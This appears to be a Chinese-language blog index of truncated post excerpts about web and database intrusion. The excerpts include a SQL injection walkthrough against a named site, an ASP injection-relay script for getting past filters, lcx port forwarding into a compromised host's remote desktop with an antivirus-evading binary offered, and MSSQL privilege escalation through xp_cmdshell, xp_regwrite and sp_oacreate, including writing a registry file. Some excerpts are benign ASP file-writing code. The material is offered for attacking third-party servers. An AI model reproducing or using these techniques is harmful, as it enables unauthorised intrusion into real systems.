摘要： 装了一个oracle db11g，于是想试一下网上流传的在sqlplus中执行cmd的一些命令，也不知怎么的，没一个好用的，可能是网上转来转去的转错了．不过有一个简单的执行cmd命令方法：SQL> host net userUser accounts for \\PC-ATQHJ4UG1SDA----------------------------------------------------------------------------__vmware_user__ admin AdministratorASPNET Guest IUSR_PC-ATQHJ4UG1SDAIWAM_P 阅读全文

摘要： from:http://hi.baidu.com/csx163/blog/item/1f6372cfa86ac037f9dc6172.html注入时如果发现有防注,可以试试红色部分是需要修改的假如http://www.fanzhiduxm.com/news.asp?Aid=195发现防注那么就改为下面内容,使用时本地搭一个ASP环境即可再用这一行代码进行注入http://127.0.0.1/proxy.asp?jmdcw=11<%JmdcwName=request("jmdcw")' 注入中转站 COOKIE 版,BY 7DaTAJmdcwName=escap 阅读全文

摘要： 注入点:http://www.romance-sky.com/authorlist.asp?id=227分析:and1=1正常and1=2出错.存在注入漏洞字段数目判断:http://www.romance-sky.com/authorlist.asp?id=227orderby7正常.表示字段数为7http://www.romance-sky.com/authorlist.asp?id=227and1=2unionselect1,2,3,4,5,6,7from表名返回2,4(字符型),5(字符型)处可以利用.http://www.romance-sky.com/authorlist.asp? 阅读全文

摘要： 本机: lcx -listen2222 33332222为转发端口，3333为本机任意未被占用的端口肉鸡：lcx -slave 119.75.217.562222127.0.0.1 3389119.75.217.56 为本机IP,2222为转发端口，127.0.0.1为肉鸡内网IP，3389为远程终端端口3389连接时格式 127.0.0.1:3333今天刚刚第一次使用，特此共享！另外提供我的免杀lcx.exe 提供给大家下载。 阅读全文

摘要： 在webshell提权过程中使用MSSQL的SA账号来提升权限拿服务器是比较有效的方法，但是在我们得到SA账号的密码去执行系统命令的时候往往会遇到各类错误提示，无法正常执行系统命令。很多菜鸟朋友们遇到类似的问题可能就会选择放弃，其实这类问题是很常见的，现在管理员安全意识有所提高，往往对SA账号做了限制，或者是对我们执行系统命令所需要的xp_cmdshell储存过程做了修改或者删除，这个xp_cmdshell就类似于我们的wscript.shell一样了，有时候遇到管理将该组件删除了的我们自己上传cmd也就不能执行了。但是这类情况我们也可以突破的，下面给大家列出一些实用SA账号执行系统命令出现的 阅读全文

摘要： 尝试在nb里面恢复cmdshell、oacreat都没有成功，所以开启sqlserveragent;exec master.dbo.xp_servicecontrol 'start','sqlserveragent';-- 还是没有成功，无奈之中希望寄托于沙盒模式，执行如下语句开启沙盒模式;execmaster..xp_regwrite 'hkey_local_machine','software\microsoft\jet\4.0\engines','sandboxmode','reg_dword' 阅读全文

摘要： 方法一：createtextfile生成文件方法 function WriteToFile(FileName,FileContent) set fso=server.createobject("scripting.filesystemobject") set fp=fso.createtextfile(server.mappath(FileName),,True) fp.write(FileContent) end function 方法二：ADODB.Stream生成文件方法 Set ccObjStream = Server.CreateObject("ADOD 阅读全文

摘要： FSO 不能操作二进制文件，要操作二进制文件，请使用：ADODB.Stream。 创建文件 dim fso, f set fso = server.CreateObject("Scripting.FileSystemObject") set f = fso.CreateTextFile("C:\test.txt", true) '第二个参数表示目标文件存在时是否覆盖 f.Write("写入内容") f.WriteLine("写入内容并换行") f.WriteBlankLines(3) '写入三个空白 阅读全文

摘要： 这是第三次发有关1433弱口令的教程了，前面两次教程也针对1433的修复和提权进行了详细的讲解，今天依然给大家带来一个1433弱口令的提权方法。说是巧妙，其实很多大牛早就在使用了，本教程旨在对初学1433弱口令提权的菜鸟们，高手请无视。 连接弱口令主机 随便运行个dos命令，看到错误提示：Error Message:xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)上一期教程的服务器也是这个错误，我们绕过错误去拿webshell，是寻找服务器上的网站，利用分离器传小马，再传大马。 这期我们就讲下这个错误产生的原因，以及巧妙的修复其实也可以说是绕过他来提权。 错误 阅读全文

摘要： --写个修改注册表的文件declare @o int,@f int,@t int,@ret intexec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o,'createtextfile',@f out,'C:\WINDOWS\Config\wfo.reg',1exec @ret=sp_oamethod @f,'writeline',NULL,'Windows Regis--写个修改注册表的文件 declare @o int,@f int 阅读全文